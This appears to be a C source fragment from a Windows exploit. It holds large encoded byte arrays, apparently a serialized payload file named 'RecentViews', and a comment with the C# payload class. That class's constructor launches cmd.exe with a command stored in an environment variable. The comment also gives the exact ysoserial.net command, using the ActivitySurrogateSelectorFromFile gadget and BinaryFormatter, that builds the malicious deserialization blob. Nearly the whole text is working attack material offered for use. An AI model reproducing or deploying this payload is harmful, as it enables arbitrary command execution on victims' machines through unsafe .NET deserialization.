0x8A, 0xBC, 0xC3, 0x26, 0xF0, 0x5A, 0x47, 0xD6, 0x9C, 0xA7, 0xC1, 0x62, 0xA6, 0x1F, 0x45, 0xCA, 0xE4, 0xD9, 0x9B, 0x00, 0xFC, 0x57, 0x1F, 0x97, 0x9D, 0x97, 0xC6, 0x3B, 0xFF, 0x6D, 0x08, 0x9B, 0x9F, 0xBA, 0xC3, 0x2A, 0xEC, 0x1D, 0x37, 0x91, 0x9D, 0xBB, 0xC8, 0x2B, 0xD0, 0x5C, 0x17, 0x91, 0xD4, 0xF1, 0xF4, 0x3B, 0xFF, 0x4F, 0x0E, 0xD6, 0xC9, 0x9A, 0xD4, 0x06, 0xF0, 0x54, 0x0E, 0x9D, 0x88, 0xBF, 0xEB, 0x20, 0xFF, 0x59, 0x3F, 0x9A, 0x88, 0xB1, 0xCB, 0x2A, 0xFA, 0x00, 0x58, 0xB2, 0x88, 0xBF, 0xD4, 0x2A, 0xBC, 0x1D, 0x02, 0x99, 0x85, 0xBD, 0xD4, 0x72, 0xBC, 0x55, 0x0E, 0x80, 0x99, 0xE9, 0x88, 0x60, 0xED, 0x5E, 0x12, 0x91, 0x84, 0xB2, 0xD4, 0x61, 0xF3, 0x54, 0x19, 0x86, 0x86, 0xA0, 0xC8, 0x29, 0xEA, 0x13, 0x19, 0x9B, 0x84, 0xFC, 0xD0, 0x26, 0xF0, 0x5B, 0x02, 0xDB, 0xDB, 0xE3, 0x97, 0x79, 0xB1, 0x45, 0x1B, 0x99, 0x85, 0xFC, 0xD7, 0x3D, 0xFB, 0x4E, 0x1F, 0x9A, 0x9D, 0xB2, 0xD3, 0x26, 0xF1, 0x53, 0x58, 0xD4, 0x91, 0xBE, 0xCB, 0x21, 0xED, 0x07, 0x09, 0x90, 0xD4, 0xF1, 0xC4, 0x23, 0xEC, 0x10, 0x14, 0x95, 0x84, 0xB6, 0xD4, 0x3F, 0xFF, 0x5E, 0x1F, 0xCE, 0xBA, 0xAA, 0xD4, 0x3B, 0xFB, 0x50, 0x54, 0xB0, 0x80, 0xB2, 0xC0, 0x21, 0xF1, 0x4E, 0x0E, 0x9D, 0x8A, 0xA0, 0x9C, 0x2E, 0xED, 0x4E, 0x1F, 0x99, 0x8B, 0xBF, 0xDE, 0x72, 0xCD, 0x44, 0x09, 0x80, 0x8C, 0xBE, 0x85, 0x6F, 0xE6, 0x50, 0x16, 0x9A, 0x9A, 0xE9, 0xDF, 0x72, 0xBC, 0x55, 0x0E, 0x80, 0x99, 0xE9, 0x88, 0x60, 0xED, 0x5E, 0x12, 0x91, 0x84, 0xB2, 0xD4, 0x61, 0xF3, 0x54, 0x19, 0x86, 0x86, 0xA0, 0xC8, 0x29, 0xEA, 0x13, 0x19, 0x9B, 0x84, 0xFC, 0xD0, 0x26, 0xF0, 0x5B, 0x02, 0xDB, 0xDB, 0xE3, 0x97, 0x79, 0xB1, 0x45, 0x1B, 0x99, 0x85, 0xF1, 0x99, 0x42, 0x94, 0x1D, 0x5A, 0xC8, 0xA6, 0xB1, 0xCD, 0x2A, 0xFD, 0x49, 0x3E, 0x95, 0x9D, 0xB2, 0xF7, 0x3D, 0xF1, 0x4B, 0x13, 0x90, 0x8C, 0xA1, 0x89, 0x00, 0xFC, 0x57, 0x1F, 0x97, 0x9D, 0x9A, 0xC9, 0x3C, 0xEA, 0x5C, 0x14, 0x97, 0x8C, 0xED, 0xAA, 0x45, 0xBE, 0x1D, 0x5A, 0xD4, 0xD5, 0xA0, 0xC3, 0x75, 0xCE, 0x4F, 0x15, 0x97, 0x8C, 0xA0, 0xD4, 0x71, 0x93, 0x37, 0x5A, 0xD4, 0xC9, 0xF3, 0x87, 0x6F, 0xA2, 
0x4E, 0x1E, 0xCE, 0xB9, 0xA1, 0xC8, 0x2C, 0xFB, 0x4E, 0x09, 0xDA, 0xBA, 0xA7, 0xC6, 0x3D, 0xEA, 0x74, 0x14, 0x92, 0x86, 0xED, 0xAA, 0x45, 0xBE, 0x1D, 0x5A, 0xD4, 0xC9, 0xF3, 0x87, 0x6F, 0xA2, 0x4E, 0x1E, 0xCE, 0xB9, 0xA1, 0xC8, 0x2C, 0xFB, 0x4E, 0x09, 0xA7, 0x9D, 0xB2, 0xD5, 0x3B, 0xD7, 0x53, 0x1C, 0x9B, 0xC9, 0x92, 0xD5, 0x28, 0xEB, 0x50, 0x1F, 0x9A, 0x9D, 0xA0, 0x9A, 0x6D, 0xB1, 0x5E, 0x5A, 0xD1, 0x99, 0xB6, 0x94, 0x77, 0xA8, 0x18, 0x58, 0xD4, 0xBA, 0xA7, 0xC6, 0x21, 0xFA, 0x5C, 0x08, 0x90, 0xAC, 0xA1, 0xD5, 0x20, 0xEC, 0x78, 0x14, 0x97, 0x86, 0xB7, 0xCE, 0x21, 0xF9, 0x00, 0x58, 0x8F, 0x91, 0xE9, 0xE9, 0x3A, 0xF2, 0x51, 0x07, 0xD6, 0xC9, 0x80, 0xD3, 0x2E, 0xF0, 0x59, 0x1B, 0x86, 0x8D, 0x9C, 0xD2, 0x3B, 0xEE, 0x48, 0x0E, 0xB1, 0x87, 0xB0, 0xC8, 0x2B, 0xF7, 0x53, 0x1D, 0xC9, 0xCB, 0xA8, 0xDF, 0x75, 0xD0, 0x48, 0x16, 0x98, 0x94, 0xF1, 0x87, 0x1A, 0xED, 0x58, 0x08, 0xBA, 0x88, 0xBE, 0xC2, 0x72, 0xBC, 0x1F, 0x5A, 0xA4, 0x88, 0xA0, 0xD4, 0x38, 0xF1, 0x4F, 0x1E, 0xC9, 0xCB, 0xA8, 0xDF, 0x75, 0xD0, 0x48, 0x16, 0x98, 0x94, 0xF1, 0x87, 0x0B, 0xF1, 0x50, 0x1B, 0x9D, 0x87, 0xEE, 0x85, 0x6D, 0xBE, 0x71, 0x15, 0x95, 0x8D, 0x86, 0xD4, 0x2A, 0xEC, 0x6D, 0x08, 0x9B, 0x8F, 0xBA, 0xCB, 0x2A, 0xA3, 0x1F, 0x3C, 0x95, 0x85, 0xA0, 0xC2, 0x6D, 0xBE, 0x7B, 0x13, 0x98, 0x8C, 0x9D, 0xC6, 0x22, 0xFB, 0x00, 0x58, 0x97, 0x84, 0xB7, 0x85, 0x6F, 0xB1, 0x03, 0x77, 0xFE, 0xC9, 0xF3, 0x87, 0x6F, 0xBE, 0x1D, 0x46, 0xDB, 0x9A, 0xB7, 0x9D, 0x1F, 0xEC, 0x52, 0x19, 0x91, 0x9A, 0xA0, 0x89, 0x1C, 0xEA, 0x5C, 0x08, 0x80, 0xA0, 0xBD, 0xC1, 0x20, 0xA0, 0x30, 0x70, 0xD4, 0xC9, 0xF3, 0x87, 0x73, 0xB1, 0x4E, 0x1E, 0xCE, 0xB9, 0xA1, 0xC8, 0x2C, 0xFB, 0x4E, 0x09, 0xCA, 0xE4, 0xD9, 0x87, 0x6F, 0xA2, 0x12, 0x35, 0x96, 0x83, 0xB6, 0xC4, 0x3B, 0xDA, 0x5C, 0x0E, 0x95, 0xB9, 0xA1, 0xC8, 0x39, 0xF7, 0x59, 0x1F, 0x86, 0xC7, 0x9C, 0xC5, 0x25, 0xFB, 0x5E, 0x0E, 0xBD, 0x87, 0xA0, 0xD3, 0x2E, 0xF0, 0x5E, 0x1F, 0xCA, 0xE4, 0xD9, 0x9B, 0x60, 0xD1, 0x5F, 0x10, 0x91, 0x8A, 0xA7, 0xE3, 0x2E, 0xEA, 0x5C, 0x2A, 0x86, 0x86, 0xA5, 
0xCE, 0x2B, 0xFB, 0x4F, 0x44, 0xFF, 0xE2 };

/*
// ExploitClass.dll
//
// Payload class carried inside the serialized RecentViews gadget chain.
// Its constructor runs cmd.exe with whatever command line is stored in the
// "pe386" environment variable, so the serialized blob itself contains no
// hardcoded command; the launcher sets pe386 before the file is deserialized.

using System;

class ExploitClass
{
    public ExploitClass()
    {
        // cmd /c <value of %pe386%>
        System.Diagnostics.Process.Start("cmd", "/c " + Environment.GetEnvironmentVariable("pe386"));
    }
}

// The RecentViews file was produced with ysoserial.net. The
// ActivitySurrogateSelectorFromFile gadget compiles the .cs named by -c
// against the assemblies listed after the semicolon (here System.dll) and
// wraps the resulting assembly in a BinaryFormatter payload written raw to stdout:
//
// ysoserial_frmv2.exe -o raw -f BinaryFormatter -g ActivitySurrogateSelectorFromFile -c .\ExploitClass.cs;System.dll > RecentViews
*/

static const unsigned char g_encodedRecentViewsV2[8427] = {
0x7A, 0xF5, 0xE9, 0xD3, 0xA7, 0xB0, 0x61, 0xC2, 0x85, 0xF5, 0xE9, 0xD3, 0xA7, 0x4F, 0x9E, 0x3D, 0x7A, 0xF8, 0xEB, 0xD3, 0xA7, 0x4F, 0xD0, 0x6E, 0x03, 0x87, 0x9D, 0xB6, 0xCA, 0x61, 0xDA, 0x5C, 0x0E, 0x95, 0xC5, 0xF3, 0xF1, 0x2A, 0xEC, 0x4E, 0x13, 0x9B, 0x87, 0xEE, 0x95, 0x61, 0xAE, 0x13, 0x4A, 0xDA, 0xD9, 0xFF, 0x87, 0x0C, 0xEB, 0x51, 0x0E, 0x81, 0x9B, 0xB6, 0x9A, 0x21, 0xFB, 0x48, 0x0E, 0x86, 0x88, 0xBF, 0x8B, 0x6F, 0xCE, 0x48, 0x18, 0x98, 0x80, 0xB0, 0xEC, 0x2A, 0xE7, 0x69, 0x15, 0x9F, 0x8C, 0xBD, 0x9A, 0x2D, 0xA9, 0x0A, 0x1B, 0xC1, 0x8A, 0xE6, 0x91, 0x7E, 0xA7, 0x0E, 0x4E, 0x91, 0xD9, 0xEB, 0x9E, 0x4A, 0x9F, 0x3D, 0x7A, 0xF4, 0xFA, 0x80, 0xDE, 0x3C, 0xEA, 0x58, 0x17, 0xDA, 0xAD, 0xB2, 0xD3, 0x2E, 0xB0, 0x79, 0x1B, 0x80, 0x88, 0x80, 0xC2, 0x3B, 0x94, 0x3D, 0x7A, 0xF4, 0xFF, 0x97, 0xC6, 0x3B, 0xFF, 0x6E, 0x1F, 0x80, 0xC7, 0x81, 0xC2, 0x22, 0xF1, 0x49, 0x13, 0x9A, 0x8E, 0x95, 0xC8, 0x3D, 0xF3, 0x5C, 0x0E, 0xE7, 0xAD, 0xB2, 0xD3, 0x2E, 0xCD, 0x58, 0x0E, 0xDA, 0xAD, 0xB2, 0xD3, 0x2E, 0xCD, 0x58, 0x0E, 0xBA, 0x88, 0xBE, 0xC2, 0x5E, 0xDA, 0x5C, 0x0E, 0x95, 0xBA, 0xB6, 0xD3, 0x61, 0xD0, 0x5C, 0x17, 0x91, 0x9A, 0xA3, 0xC6, 0x2C, 0xFB, 0x33, 0x3E, 0x95, 0x9D, 0xB2, 0xF4, 0x2A, 0xEA, 0x13, 0x2A, 0x86, 0x8C, 0xB5, 0xCE, 0x37, 0x8B, 0x79, 0x1B, 0x80, 0x88, 0x80, 0xC2, 0x3B, 0xB0, 0x7E, 0x1B, 0x87, 0x8C, 0x80, 0xC2, 0x21, 0xED, 0x54, 0x0E, 0x9D, 0x9F, 0xB6, 0xB5, 0x0B, 0xFF, 0x49, 0x1B, 0xA7, 0x8C, 0xA7, 0x89, 0x03, 0xF1, 0x5E, 0x1B, 0x98, 0x8C, 0x9F, 0xE4, 0x06, 0xDA, 0x27, 0x3E, 0x95, 0x9D, 0xB2, 0xF4, 0x2A, 0xEA, 0x13, 0x3F, 0x9A, 0x8F, 0xBC, 0xD5, 0x2C, 0xFB, 0x7E,
0x15, 0x9A, 0x9A, 0xA7, 0xD5, 0x2E, 0xF7, 0x53, 0x0E, 0x87, 0xF3, 0x97, 0xC6, 0x3B, 0xFF, 0x6E, 0x1F, 0x80, 0xC7, 0x96, 0xDF, 0x3B, 0xFB, 0x53, 0x1E, 0x91, 0x8D, 0x83, 0xD5, 0x20, 0xEE, 0x58, 0x08, 0x80, 0x80, 0xB6, 0xD4, 0x5B, 0xDA, 0x5C, 0x0E, 0x95, 0xBA, 0xB6, 0xD3, 0x61, 0xCA, 0x5C, 0x18, 0x98, 0x8C, 0xA0, 0x89, 0x0C, 0xF1, 0x48, 0x14, 0x80, 0xF9, 0x97, 0xC6, 0x3B, 0xFF, 0x6E, 0x1F, 0x80, 0xC7, 0x87, 0xC6, 0x2D, 0xF2, 0x58, 0x09, 0xAB, 0xD9, 0xD7, 0xA6, 0x4E, 0x9F, 0x3D, 0x7A, 0xF4, 0xEB, 0xD3, 0xA0, 0x50, 0xCD, 0x44, 0x09, 0x80, 0x8C, 0xBE, 0x89, 0x0B, 0xFF, 0x49, 0x1B, 0xDA, 0xBA, 0xB6, 0xD5, 0x26, 0xFF, 0x51, 0x13, 0x8E, 0x88, 0xA7, 0xCE, 0x20, 0xF0, 0x7B, 0x15, 0x86, 0x84, 0xB2, 0xD3, 0x4D, 0x9E, 0x3D, 0x7A, 0xF5, 0xE1, 0xD2, 0xAF, 0x4D, 0x9C, 0x3D, 0x7A, 0xF4, 0xEC, 0x2E, 0x58, 0xB0, 0x61, 0x22, 0x29, 0x8D, 0x9A, 0xA7, 0xC2, 0x22, 0xB0, 0x79, 0x1B, 0x80, 0x88, 0xFD, 0xF4, 0x2A, 0xEC, 0x54, 0x1B, 0x98, 0x80, 0xA9, 0xC6, 0x3B, 0xF7, 0x52, 0x14, 0xB2, 0x86, 0xA1, 0xCA, 0x2E, 0xEA, 0x3C, 0x7A, 0xF4, 0xE9, 0xD4, 0xD1, 0x2E, 0xF2, 0x48, 0x1F, 0xAB, 0xB6, 0xD3, 0xAF, 0x4D, 0x9E, 0x3D, 0x7A, 0xF5, 0xE9, 0xD3, 0xA7, 0x49, 0x9A, 0x3D, 0x7A, 0xF4, 0xE9, 0xDA, 0xA3, 0x4F, 0x9E, 0x3D, 0x73, 0xF0, 0xE9, 0xD3, 0xA7, 0x4F, 0x97, 0x39, 0x7A, 0xF4, 0xE9, 0xD9, 0xA6, 0x4F, 0x9E, 0x3D, 0x73, 0xF1, 0xE9, 0xD3, 0xA7, 0x40, 0x9B, 0x3D, 0x7A, 0xF4, 0x12, 0xCD, 0xA7, 0x4F, 0x9C, 0x3D, 0x7B, 0xF4, 0xE9, 0xD3, 0x58, 0xB0, 0x61, 0xC2, 0x7B, 0xF4, 0xE9, 0xD3, 0xA7, 0x4F, 0x9E, 0x3D, 0x7E, 0xF5, 0xE9, 0xD3, 0xA7, 0x30, 0xCD, 0x44, 0x09, 0x80, 0x8C, 0xBE, 0x89, 0x0C, 0xF1, 0x51, 0x16, 0x91, 0x8A, 0xA7, 0xCE, 0x20, 0xF0, 0x4E, 0x54, 0xB3, 0x8C, 0xBD, 0xC2, 0x3D, 0xF7, 0x5E, 0x54, 0xB8, 0x80, 0xA0, 0xD3, 0x2F, 0xAF, 0x66, 0x21, 0xA7, 0x90, 0xA0, 0xD3, 0x2A, 0xF3, 0x13, 0x35, 0x96, 0x83, 0xB6, 0xC4, 0x3B, 0xB2, 0x1D, 0x17, 0x87, 0x8A, 0xBC, 0xD5, 0x23, 0xF7, 0x5F, 0x56, 0xD4, 0xBF, 0xB6, 0xD5, 0x3C, 0xF7, 0x52, 0x14, 0xC9, 0xDB, 0xFD, 0x97, 0x61, 0xAE, 0x13, 0x4A, 0xD8, 0xC9, 0x90, 0xD2, 
0x23, 0xEA, 0x48, 0x08, 0x91, 0xD4, 0xBD, 0xC2, 0x3A, 0xEA, 0x4F, 0x1B, 0x98, 0xC5, 0xF3, 0xF7, 0x3A, 0xFC, 0x51, 0x13, 0x97, 0xA2, 0xB6, 0xDE, 0x1B, 0xF1, 0x56, 0x1F, 0x9A, 0xD4, 0xB1, 0x90, 0x78, 0xFF, 0x08, 0x19, 0xC1, 0xDF, 0xE2, 0x9E, 0x7C, 0xAA, 0x58, 0x4A, 0xCC, 0xD0, 0x8E, 0xFA, 0x4C, 0x9E, 0x3D, 0x7A, 0xF2, 0xB6, 0xBA, 0xD3, 0x2A, 0xF3, 0x4E, 0x7F, 0xAB, 0x9A, 0xBA, 0xDD, 0x2A, 0x96, 0x62, 0x0C, 0x91, 0x9B, 0xA0, 0xCE, 0x20, 0xF0, 0x38, 0x7A, 0xF4, 0xE1, 0xDB, 0xAE, 0x4D, 0x9E, 0x3D, 0x7A, 0xF3, 0xE9, 0xD3, 0xA7, 0x48, 0x9E, 0x3D, 0x7A, 0xE4, 0xEB, 0xD3, 0xA7, 0x4F, 0x96, 0x3D, 0x7A, 0xF4, 0xE0, 0xD0, 0xA7, 0x4F, 0x9E, 0x34, 0x7E, 0xF4, 0xE9, 0xD3, 0xAE, 0x4A, 0x9E, 0x3D, 0x7A, 0xFD, 0xEF, 0xD3, 0xA7, 0x4F, 0x97, 0x3A, 0x7A, 0xF4, 0xE9, 0xDA, 0xAF, 0x4F, 0x9E, 0x3D, 0x73, 0xFD, 0xE9, 0xD3, 0xA7, 0x45, 0x92, 0x37, 0x7A, 0xF4, 0xE9, 0xB2, 0xF4, 0x36, 0xED, 0x49, 0x1F, 0x99, 0xC7, 0x84, 0xC8, 0x3D, 0xF5, 0x5B, 0x16, 0x9B, 0x9E, 0xFD, 0xE4, 0x20, 0xF3, 0x4D, 0x15, 0x9A, 0x8C, 0xBD, 0xD3, 0x02, 0xF1, 0x59, 0x1F, 0x98, 0xC5, 0xF3, 0xF1, 0x2A, 0xEC, 0x4E, 0x13, 0x9B, 0x87, 0xEE, 0x94, 0x61, 0xAE, 0x13, 0x4A, 0xDA, 0xD9, 0xFF, 0x87, 0x0C, 0xEB, 0x51, 0x0E, 0x81, 0x9B, 0xB6, 0x9A, 0x21, 0xFB, 0x48, 0x0E, 0x86, 0x88, 0xBF, 0x8B, 0x6F, 0xCE, 0x48, 0x18, 0x98, 0x80, 0xB0, 0xEC, 0x2A, 0xE7, 0x69, 0x15, 0x9F, 0x8C, 0xBD, 0x9A, 0x7C, 0xAF, 0x5F, 0x1C, 0xC7, 0xD1, 0xE6, 0x91, 0x2E, 0xFA, 0x0E, 0x4C, 0xC0, 0x8C, 0xE0, 0x92, 0x4A, 0x9D, 0x3D, 0x7A, 0xF4, 0x83, 0x80, 0xDE, 0x3C, 0xEA, 0x58, 0x17, 0xDA, 0xBE, 0xBC, 0xD5, 0x24, 0xF8, 0x51, 0x15, 0x83, 0xC7, 0x90, 0xC8, 0x22, 0xEE, 0x52, 0x14, 0x91, 0x87, 0xA7, 0xEA, 0x20, 0xFA, 0x58, 0x16, 0xDA, 0xBA, 0xB6, 0xD5, 0x26, 0xFF, 0x51, 0x13, 0x8E, 0x88, 0xA7, 0xCE, 0x20, 0xF0, 0x13, 0x3B, 0x97, 0x9D, 0xBA, 0xD1, 0x26, 0xEA, 0x44, 0x29, 0x81, 0x9B, 0xA1, 0xC8, 0x28, 0xFF, 0x49, 0x1F, 0xA7, 0x8C, 0xBF, 0xC2, 0x2C, 0xEA, 0x52, 0x08, 0xDF, 0xA6, 0xB1, 0xCD, 0x2A, 0xFD, 0x49, 0x29, 0x81, 0x9B, 0xA1, 0xC8, 0x28, 0xFF, 0x49, 0x1F, 0xDF, 
0xA6, 0xB1, 0xCD, 0x2A, 0xFD, 0x49, 0x29, 0x91, 0x9B, 0xBA, 0xC6, 0x23, 0xF7, 0x47, 0x1F, 0x90, 0xBB, 0xB6, 0xC1, 0x4D, 0x9E, 0x3D, 0x7A, 0xF0, 0x9D, 0xAA, 0xD7, 0x2A, 0x95, 0x50, 0x1F, 0x99, 0x8B, 0xB6, 0xD5, 0x0B, 0xFF, 0x49, 0x1B, 0x87, 0xEA, 0xD6, 0xB8, 0x1C, 0xE7, 0x4E, 0x0E, 0x91, 0x84, 0xFD, 0xF2, 0x21, 0xF7, 0x49, 0x03, 0xA7, 0x8C, 0xA1, 0xCE, 0x2E, 0xF2, 0x54, 0x00, 0x95, 0x9D, 0xBA, 0xC8, 0x21, 0xD6, 0x52, 0x16, 0x90, 0x8C, 0xA1, 0xAD, 0x4F, 0x9E, 0x3D, 0x73, 0xFF, 0xE9, 0xD3, 0xA7, 0x46, 0x92, 0x3D, 0x7A, 0xF4, 0xE8, 0xD7, 0xA7, 0x4F, 0x9E, 0x3E, 0x7A, 0xF4, 0xE9, 0xDA, 0xAA, 0x4F, 0x9E, 0x3D, 0x73, 0xFA, 0xE9, 0xD3, 0xA7, 0x4E, 0x9B, 0x3D, 0x7A, 0xF4, 0xEA, 0xD3, 0xA7, 0x4F, 0x97, 0x32, 0x7A, 0xF4, 0xE9, 0xDA, 0xB7, 0x4F, 0x9E, 0x3D, 0x7B, 0xF2, 0xE9, 0xD3, 0xA7, 0x4C, 0x9E, 0x3D, 0x7A, 0xFD, 0xF8, 0xD3, 0xA7, 0x4F, 0x97, 0x2F, 0x7A, 0xF4, 0xE9, 0xD2, 0xA0, 0x4F, 0x9E, 0x3D, 0x79, 0xF4, 0xE9, 0xD3, 0xAE, 0x5C, 0x9E, 0x3D, 0x7A, 0xFD, 0xFD, 0xD3, 0xA7, 0x4F, 0x9F, 0x35, 0x7A, 0xF4, 0xE9, 0xD0, 0xA7, 0x4F, 0x9E, 0x34, 0x6F, 0xF4, 0xE9, 0xD3, 0xAE, 0x59, 0x9E, 0x3D, 0x7A, 0xF0, 0xE0, 0xD3, 0xA7, 0x4F, 0x82, 0x6E, 0x03, 0x87, 0x9D, 0xB6, 0xCA, 0x61, 0xDD, 0x52, 0x16, 0x98, 0x8C, 0xB0, 0xD3, 0x26, 0xF1, 0x53, 0x09, 0xDA, 0xA1, 0xB2, 0xD4, 0x27, 0xEA, 0x5C, 0x18, 0x98, 0x8C, 0xD4, 0xA7, 0x4F, 0x9E, 0x37, 0x36, 0x9B, 0x88, 0xB7, 0xE1, 0x2E, 0xFD, 0x49, 0x15, 0x86, 0xEE, 0x85, 0xC2, 0x3D, 0xED, 0x54, 0x15, 0x9A, 0xE1, 0x90, 0xC8, 0x22, 0xEE, 0x5C, 0x08, 0x91, 0x9B, 0xC3, 0xEF, 0x2E, 0xED, 0x55, 0x39, 0x9B, 0x8D, 0xB6, 0xF7, 0x3D, 0xF1, 0x4B, 0x13, 0x90, 0x8C, 0xA1, 0xAF, 0x07, 0xFF, 0x4E, 0x12, 0xA7, 0x80, 0xA9, 0xC2, 0x4B, 0xD5, 0x58, 0x03, 0x87, 0xEF, 0x85, 0xC6, 0x23, 0xEB, 0x58, 0x09, 0xF4, 0xE9, 0xD0, 0xA4, 0x4F, 0x9B, 0x38, 0x71, 0xFC, 0xF5, 0x80, 0xDE, 0x3C, 0xEA, 0x58, 0x17, 0xDA, 0xAA, 0xBC, 0xCB, 0x23, 0xFB, 0x5E, 0x0E, 0x9D, 0x86, 0xBD, 0xD4, 0x61, 0xD7, 0x7E, 0x15, 0x99, 0x99, 0xB2, 0xD5, 0x2A, 0xEC, 0x19, 0x29, 0x8D, 0x9A, 0xA7, 0xC2, 0x22, 0xB0, 
0x7E, 0x15, 0x98, 0x85, 0xB6, 0xC4, 0x3B, 0xF7, 0x52, 0x14, 0x87, 0xC7, 0x9A, 0xEF, 0x2E, 0xED, 0x55, 0x39, 0x9B, 0x8D, 0xB6, 0xF7, 0x3D, 0xF1, 0x4B, 0x13, 0x90, 0x8C, 0xA1, 0xAF, 0xA3, 0xCF, 0x05, 0x45, 0xF6, 0xE9, 0xD3, 0xA7, 0x45, 0x94, 0x36, 0x7A, 0xF4, 0xE9, 0xDA, 0xB0, 0x4F, 0x9E, 0x3D, 0x73, 0xEC, 0xE9, 0xD3, 0xA7, 0x4B, 0x95, 0x3D, 0x7A, 0xF4, 0xF6, 0x80, 0xDE, 0x3C, 0xEA, 0x58, 0x17, 0xDA, 0xBC, 0xBD, 0xCE, 0x3B, 0xE7, 0x6E, 0x1F, 0x86, 0x80, 0xB2, 0xCB, 0x26, 0xE4, 0x5C, 0x0E, 0x9D, 0x86, 0xBD, 0xEF, 0x20, 0xF2, 0x59, 0x1F, 0x86, 0xEA, 0xD3, 0xA7, 0x4F, 0x9A, 0x79, 0x1B, 0x80, 0x88, 0xDA, 0xF2, 0x21, 0xF7, 0x49, 0x03, 0xA0, 0x90, 0xA3, 0xC2, 0x43, 0xDF, 0x4E, 0x09, 0x91, 0x84, 0xB1, 0xCB, 0x36, 0xD0, 0x5C, 0x17, 0x91, 0xE8, 0xD3, 0xA6, 0x47, 0x98, 0x24, 0x7A, 0xF4, 0xE9, 0x2B, 0xA6, 0x1C, 0xE7, 0x4E, 0x0E, 0x91, 0x84, 0xFD, 0xEB, 0x26, 0xF0, 0x4C, 0x54, 0xB1, 0x87, 0xA6, 0xCA, 0x2A, 0xEC, 0x5C, 0x18, 0x98, 0x8C, 0xF8, 0xF0, 0x27, 0xFB, 0x4F, 0x1F, 0xA7, 0x8C, 0xBF, 0xC2, 0x2C, 0xEA, 0x71, 0x13, 0x87, 0x9D, 0x9A, 0xD3, 0x2A, 0xEC, 0x5C, 0x0E, 0x9B, 0x9B, 0xB3, 0x95, 0x14, 0xC5, 0x6E, 0x03, 0x87, 0x9D, 0xB6, 0xCA, 0x61, 0xDC, 0x44, 0x0E, 0x91, 0xB2, 0x8E, 0x8B, 0x6F, 0xF3, 0x4E, 0x19, 0x9B, 0x9B, 0xBF, 0xCE, 0x2D, 0xB2, 0x1D, 0x2C, 0x91, 0x9B, 0xA0, 0xCE, 0x20, 0xF0, 0x00, 0x48, 0xDA, 0xD9, 0xFD, 0x97, 0x61, 0xAE, 0x11, 0x5A, 0xB7, 0x9C, 0xBF, 0xD3, 0x3A, 0xEC, 0x58, 0x47, 0x9A, 0x8C, 0xA6, 0xD3, 0x3D, 0xFF, 0x51, 0x56, 0xD4, 0xB9, 0xA6, 0xC5, 0x23, 0xF7, 0x5E, 0x31, 0x91, 0x90, 0x87, 0xC8, 0x24, 0xFB, 0x53, 0x47, 0x96, 0xDE, 0xE4, 0xC6, 0x7A, 0xFD, 0x08, 0x4C, 0xC5, 0xD0, 0xE0, 0x93, 0x2A, 0xAE, 0x05, 0x43, 0xA9, 0xC5, 0x88, 0xF4, 0x36, 0xED, 0x49, 0x1F, 0x99, 0xC7, 0x81, 0xC2, 0x29, 0xF2, 0x58, 0x19, 0x80, 0x80, 0xBC, 0xC9, 0x61, 0xDF, 0x4E, 0x09, 0x91, 0x84, 0xB1, 0xCB, 0x36, 0xB2, 0x1D, 0x17, 0x87, 0x8A, 0xBC, 0xD5, 0x23, 0xF7, 0x5F, 0x56, 0xD4, 0xBF, 0xB6, 0xD5, 0x3C, 0xF7, 0x52, 0x14, 0xC9, 0xDB, 0xFD, 0x97, 0x61, 0xAE, 0x13, 0x4A, 0xD8, 0xC9, 0x90, 
0xD2, 0x23, 0xEA, 0x48, 0x08, 0x91, 0xD4, 0xBD, 0xC2, 0x3A, 0xEA, 0x4F, 0x1B, 0x98, 0xC5, 0xF3, 0xF7, 0x3A, 0xFC, 0x51, 0x13, 0x97, 0xA2, 0xB6, 0xDE, 0x1B, 0xF1, 0x56, 0x1F, 0x9A, 0xD4, 0xB1, 0x90, 0x78, 0xFF, 0x08, 0x19, 0xC1, 0xDF, 0xE2, 0x9E, 0x7C, 0xAA, 0x58, 0x4A, 0xCC, 0xD0, 0x8E, 0xFA, 0x4B, 0x9E, 0x3D, 0x7A, 0xF2, 0xF3, 0xD3, 0xA7, 0x4F, 0xD0, 0x6E, 0x03, 0x87, 0x9D, 0xB6, 0xCA, 0x61, 0xDD, 0x52, 0x08, 0x91, 0xC5, 0xF3, 0xF1, 0x2A, 0xEC, 0x4E, 0x13, 0x9B, 0x87, 0xEE, 0x94, 0x61, 0xAB, 0x13, 0x4A, 0xDA, 0xD9, 0xFF, 0x87, 0x0C, 0xEB, 0x51, 0x0E, 0x81, 0x9B, 0xB6, 0x9A, 0x21, 0xFB, 0x48, 0x0E, 0x86, 0x88, 0xBF, 0x8B, 0x6F, 0xCE, 0x48, 0x18, 0x98, 0x80, 0xB0, 0xEC, 0x2A, 0xE7, 0x69, 0x15, 0x9F, 0x8C, 0xBD, 0x9A, 0x2D, 0xA9, 0x0A, 0x1B, 0xC1, 0x8A, 0xE6, 0x91, 0x7E, 0xA7, 0x0E, 0x4E, 0x91, 0xD9, 0xEB, 0x9E, 0x5F, 0x92, 0x3D, 0x7A, 0xF4, 0xEE, 0xD3, 0xA7, 0x4F, 0x97, 0x26, 0x7A, 0xF4, 0xE9, 0xD9, 0xAE, 0x53, 0x9E, 0x3D, 0x7A, 0xFD, 0xF4, 0xD3, 0xA7, 0x4F, 0x96, 0x35, 0x7A, 0xF4, 0xE9, 0xD3, 0xAD, 0x47, 0x96, 0x3C, 0x7A, 0xF4, 0xE9, 0xD2, 0xAA, 0x4F, 0x9E, 0x3D, 0x71, 0xF4, 0xE9, 0xD3, 0xA1, 0x51, 0x9E, 0x3D, 0x7A, 0x0C, 0xE8, 0x80, 0xDE, 0x3C, 0xEA, 0x58, 0x17, 0xDA, 0xA5, 0xBA, 0xC9, 0x3E, 0xB0, 0x78, 0x14, 0x81, 0x84, 0xB6, 0xD5, 0x2E, 0xFC, 0x51, 0x1F, 0xDF, 0xD5, 0x80, 0xC2, 0x23, 0xFB, 0x5E, 0x0E, 0xB9, 0x88, 0xBD, 0xDE, 0x06, 0xEA, 0x58, 0x08, 0x95, 0x9D, 0xBC, 0xD5, 0x71, 0xFA, 0x62, 0x25, 0xC5, 0xDD, 0xB3, 0x95, 0x14, 0xC5, 0x6E, 0x03, 0x87, 0x9D, 0xB6, 0xCA, 0x61, 0xCC, 0x58, 0x1C, 0x98, 0x8C, 0xB0, 0xD3, 0x26, 0xF1, 0x53, 0x54, 0xB5, 0x9A, 0xA0, 0xC2, 0x22, 0xFC, 0x51, 0x03, 0xD8, 0xC9, 0xBE, 0xD4, 0x2C, 0xF1, 0x4F, 0x16, 0x9D, 0x8B, 0xFF, 0x87, 0x19, 0xFB, 0x4F, 0x09, 0x9D, 0x86, 0xBD, 